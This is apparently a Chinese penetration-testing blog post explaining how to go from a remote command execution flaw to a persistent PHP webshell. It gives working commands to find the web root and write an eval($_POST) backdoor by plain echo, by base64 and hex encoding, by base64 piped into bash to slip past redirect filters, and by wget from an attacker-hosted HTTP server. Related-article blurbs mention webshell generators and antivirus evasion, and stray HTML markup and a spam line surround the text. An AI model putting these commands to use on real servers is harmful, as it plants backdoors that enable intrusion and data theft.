<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    命令執行寫webshell總結

    VSole2021-10-17 05:44:07

    前言

    當我們找到一個rce漏洞卻無法反彈shell時,在web路徑寫webshell用連接工具進行管理會方便的多,本文總結從命令執行到webshell的流程化操作。

    尋找web路徑

    寫webshell當然要寫在web路徑,第一步要做的就是快速尋找web路徑

    1.文件查找法

    一般web路徑一定會有index.html\php\jsp\asp,login.xxx文件。可以根據已知頁面文件名全局搜索

    linux:
    find / -name index.php
    find / -name index.*
    windows:
    for /r d:/ %i in (index.html) do @echo %i
    for /r d:/ %i in (index.*) do @echo %i
    

    2.源碼查找法

    也可以選擇打開當前已知web頁面的f12查看源碼,尋找一段特征足夠明顯的源碼進行查找

    linux:
    find / -name "*.*" | xargs grep "PHP installed properly"
    find /var/www/ -name "*.php" | xargs grep "doServerTest()"
    
    windows:
    findstr /s/i/n /d:D:\sec_tools\ /c:"html" *.html
    findstr /s/i/n /d:C:\windows\ /c:"success" *.*
    

    3.history等

    通過linux歷史命令查找web相關的服務啟動命令

    history | grep nginx
    history | grep tomcat
    history | grep http
    

    寫入webshell

    確認尋找到的路徑有寫入權限之后,就可以開始寫webshell了

    1.echo直接寫入

    echo ' eval($_POST[1]); ?>' > 1.php
    

    直接寫入webshell一般不會成功,因為webshell中使用的某些關鍵符號可能被轉碼或屏蔽

    2.base64寫入

    echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==" | base64 -d >2.php
    

    使用base64是比較通用的方法,完美去除了webshell本身的特殊字符

    3.繞過重定向符

    echo "ZWNobyAiUEQ5d2FIQWdaWFpoYkNna1gxQlBVMVJiTVYwcE95QS9QZz09IiB8IGJhc2U2NCAtZCA+My5waHA=" | base64 -d | bash
    


    echo "ZWNobyAiUEQ5d2FIQWdaWFpoYkNna1gxQlBVMVJiTVYwcE95QS9QZz09IiB8IGJhc2U2NCAtZCA+My5waHA=" | base64 -d | sh
    

    重定向符>不可用時,我們可以將1或2中的整體命令base64編碼,然后解碼后通過bash或sh執行

    其他字符繞過方式,如空格對應${IFS}等,可參考命令注入的繞過方式 http://uuzdaisuki.com/2020/07/15/%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/

    4.遠端下載webshell

    遠端服務器放置webshell,開啟http
    python -m http.server
    
    目標機器執行
    wget http://xx.xx.xxx.xx:8000/xxx.php
    

    可出網且有wget的情況下可采用此方式

    5.hex寫入

    hex寫入與base64寫入相似,在 https://www.107000.com/T-Hex/

    將webshell編碼成hex,使用xxd命令還原

    或在使用前將webshell使用xxd生成hex數據

    echo ' eval($_POST[1]); ?>' |xxd -ps
    

    然后命令注入執行

    echo 3C3F706870206576616C28245F504F53545B315D293B203F3E|xxd -r -ps > 5.php
    
    webshellbase64
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    shiro打點獲取10段服務器權限,在10段機器出網且已上線cs;172段不出網且反向不通10段,已通過mysql弱口令獲取system權限,存在web服務。
    WSH是一款功能強大的Web Shell生成器和命令行接口工具。WSH的客戶端支持命令歷史記錄和日志記錄功能,并且可以跟以前部署的標準Webshell交互。生成器使用了PHP、ASP和JSP來創建Webshell。它們使用隨機變量生成,因此每一個都擁有單獨的哈希。它們可以使用白名單或密碼進行配置,并允許通過自定義Header和參數進行發送。廣大研究人員可以使用下列命令將該項目源碼克隆至本地:
    Windows defender 介紹Microsoft Defender 防病毒軟件在 Windows 1
    在滲透測試中,拿到 webshell 后執行命令總會碰到很多不便,而使用 ssh 登錄則會方便許多。相比使用 webshell 工具執行命令,ssh 連接可以有命令提示、路徑補全、支持二次交互等優勢,本文記錄一個從 WEB RCE 漏洞到 SSH 登錄的姿勢。架設代理網站不出網,所以需要架設 socks 代理訪問 ssh 端口及內網主機,這里使用 Neo-reGeorg。
    從 RCE 到 SSH 登錄
    webshell免殺之傳參方式及特征繞過傳參方式 在這里解釋一下為什么,需要講述傳參方式,由于在很多情況下,以請求頭作為參數傳遞并非waf和人工排查的重中之重且非常誤導和隱藏
    哥斯拉WebShell免殺生成器
    溯源排查中比較重要的一環是web突破口排查,攻擊者通過web突破口入侵時,有極大的概率會寫入webshell,本文介紹下常見的webshell排查方法和流程。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类